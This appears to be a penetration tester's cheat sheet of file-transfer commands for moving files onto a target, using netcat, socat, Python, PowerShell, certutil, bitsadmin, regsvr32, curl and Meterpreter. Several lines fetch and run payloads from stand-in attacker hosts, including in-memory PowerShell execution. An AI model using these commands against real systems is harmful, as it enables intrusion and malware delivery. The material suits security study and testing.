File Transfers

Download Files to Target

===================

NETCAT

===================

On Receiving End

nc -l -p 1234 > out.file

On Sending End

nc -w 3 [destination] 1234 < out.file


OR


On Receving End

nc -l -p 1234 | uncompress -c | tar xvfp -

On Sending End

tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234


===================

SOCAT

===================

On Server Sending File Do

socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr

On Client Receiving File Do

socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat


OR


On Server Receving File Do

socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt

On Client Sending File Do

socat -u FILE:test.txt TCP:127.0.0.1:9876



=======================

PYTHON3

=======================

URLLIB REQUEST MODULE

import urllib.request
print('Beginning file download with urllib2...')
url = '<url>/<uriToFile>'
urllib.request.urlretrieve(url, '/Users/tobor/Downloads/<filename.txt>')


OR


URLLIB2 MODULE

import urllib2
filedata = urllib2.urlopen('<url>/<uriToFile>')
datatowrite = filedata.read()
with open('/Users/tobor/Downloads/file.txt', 'wb') as f:
   f.write(datatowrite)


OR


REQUESTS MODULE

import requests
print('Beginning file download with requests')
url = '<url>/<uriToFile>'
r = requests.get(url)
with open('/Users/tobor/Downloads/file.txt', 'wb') as f:
   f.write(r.content)
# Retrieve HTTP meta-data
print(r.status_code)
print(r.headers['content-type'])
print(r.encoding)


OR


WGET MODULE

import wget
print('Beginning file download with wget module')
url = '<url>/<uriToFile>'
wget.download(url, '/Users/tobor/Downloads/file.txt')



====================

WINDOWS

====================

PowerCat:

Send File:
   powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Recieve File:
   powercat -l -p 8000 -of C:\inputfile


Download Powershell Script and Execute Without Touching Disk:

IEX(New-Object Net.WebClient).downloadString('<url>/<payload>') ;<methodName>
 


Download To File:

Invoke-WebRequest "http://<ip>:<port>/<in file>" -OutFile "<out file>"

Download File With PowerShell

Start-BitsTransfer http://<attackerip>:<port>/<payload> -Destinations C:\Path\To\Save\File.ps1
 


Download File With Command Prompt

certutil.exe -urlcache -split -f http://<attackMachineIP>:<port>/Payload.exe C:\Path\To\Save\File



Download File With BitsAdmin

bitsadmin /transfer debjob /download /priority normal <url> <pathToSaveTo>


OR


bitsadmin /create /download <JobName>

bitsadmin /addFile <JobName> http://<attackerip>:<port>/payload.exe C:\Path\To\Download\To.txt

bitsadmin /setproxysettings <JobName> OVERRIDE proxy1:80 "<local>"

bitsadmin /resume <JobName>

bitsadmin /monitor

bitsadmin /complete <JobName>



Download and Execute File Using RegSVR

regsvr32 /s /n /u /i:<url>:<port>/<payload> scrobj.dll


====================

LINUX

====================

WGET

wget -O <Preferred_FileName> <url>



CURL

Curl To Download File

curl -o output.file <url>/<uritoFile>
curl -O <uritoFile>

curl --remote-name <url>/<uritoFile>

curl -u Username:Password <url>/<uritoFile>



Curl to Download Multiple Files

curl -O <url>/<uritoFile> -O <url>/<uritoFile>



Curl To Download Web Page

curl -o nixcraft.html <url>/<uritoFile>



Curl to Download From SSH Server

curl -u username sftp://server1.cyberciti.biz/path/to/file.txt

OR

curl -u username: --key ~/.ssh/id_rsa --pubkey ~/.ssh/id_rsa.pub 


Curl to Download From FTP Server

curl ftp://username:passwordd@<domain.com>:21/path/to/backup.tar.gz



METERPRETER

download -f <pathToFile> <SaveFileLocation>